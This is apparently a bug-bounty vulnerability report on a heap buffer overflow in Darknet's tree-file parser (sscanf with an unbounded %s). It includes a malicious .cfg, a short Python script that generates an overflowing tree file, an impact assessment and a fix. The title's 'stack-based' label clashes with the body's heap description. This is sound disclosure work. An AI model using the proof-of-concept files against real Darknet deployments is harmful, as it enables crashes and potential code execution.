darknet-sscanf-stack-overflow-poc / FINDING-darknet-sscanf-stack-overflow-tree.md
ryansecuritytest-fanpierlabs's picture
Upload FINDING-darknet-sscanf-stack-overflow-tree.md with huggingface_hub
beb6386 verified

Stack-Based Buffer Overflow via sscanf %s in Tree File Parsing

Target

  • Repository: hank-ai/darknet (v3 / current main)
  • Bounty Program: huntr.com -- Model Format ($1,500)
  • Vulnerability Type: Stack/Heap Buffer Overflow (CWE-120)
  • Severity: HIGH
  • CVSS 3.1: ~7.8

Summary

When Darknet loads a .cfg file with a [region] section that specifies tree=<filename>, the referenced tree file is parsed by Darknet::read_tree() in tree.cpp. This function uses sscanf(line, "%s %d", id, &parent) where id is a heap buffer of only 256 bytes. The %s format specifier in sscanf has no width limit, so a line in the tree file containing a string longer than 255 characters will overflow the id buffer, corrupting adjacent heap memory.

Affected Code

File: src-lib/tree.cpp (lines 88-91)

while((line=fgetl(fp)) != 0){
    char* id = (char*)xcalloc(256, sizeof(char));   // 256-byte heap allocation
    int parent = -1;
    sscanf(line, "%s %d", id, &parent);             // %s has NO width limit!
    ...
    t.name[n] = id;                                  // overflowed buffer kept in use

The fgetl() function dynamically reallocates to read lines of arbitrary length (it starts at 512 bytes and doubles as needed). So a tree file line can be megabytes long. The sscanf %s then writes the entire first whitespace-delimited token into the 256-byte id buffer.

Exploitation

Attack Chain

  1. Attacker creates a malicious .cfg file with a [region] section:

    [net]
    width=416
    height=416
    channels=3
    
    [convolutional]
    filters=30
    size=1
    stride=1
    pad=1
    activation=linear
    
    [region]
    classes=20
    num=5
    tree=malicious_tree.txt
    
  2. The malicious_tree.txt file contains a line with a string longer than 255 chars:

    AAAAAAAAAAAAAAAA....[300+ chars]....AAAA 0
    
  3. When parse_region_section() calls read_tree() (via l.softmax_tree = read_tree(tree_file.c_str())), the sscanf writes 300+ bytes into a 256-byte heap buffer.

Proof-of-Concept Tree File

# generate_malicious_tree.py
with open("malicious_tree.txt", "w") as f:
    # First token is 512 bytes (overflows 256-byte buffer by 256 bytes)
    f.write("A" * 512 + " 0\n")
    f.write("B 0\n")

Impact

  • Heap Corruption: The overflow writes past the 256-byte id buffer, corrupting adjacent heap metadata and objects.
  • Denial of Service: Guaranteed crash from heap corruption.
  • Potential Code Execution: The overwritten heap memory may include:
    • Heap chunk metadata (enabling heap exploitation techniques)
    • Previously allocated t.parent, t.name, t.group_offset, or t.group_size arrays (which are repeatedly xrealloc'd in the same loop)
    • Function pointers or other sensitive data
  • The attacker controls the exact content of the overflow (the string characters).

Fix

Use a width-limited format specifier in the sscanf call:

// BEFORE (vulnerable):
sscanf(line, "%s %d", id, &parent);

// AFTER (fixed):
sscanf(line, "%255s %d", id, &parent);  // limit to 255 chars + null terminator

Or better yet, replace with C++ string parsing:

std::string line_str(line);
std::istringstream iss(line_str);
std::string id_str;
int parent = -1;
iss >> id_str >> parent;
// Then use id_str.c_str() or store id_str directly

References

  • CWE-120: Buffer Copy without Checking Size of Input (Classic Buffer Overflow)
  • CWE-787: Out-of-bounds Write
  • CWE-134: Use of Externally-Controlled Format String (related pattern)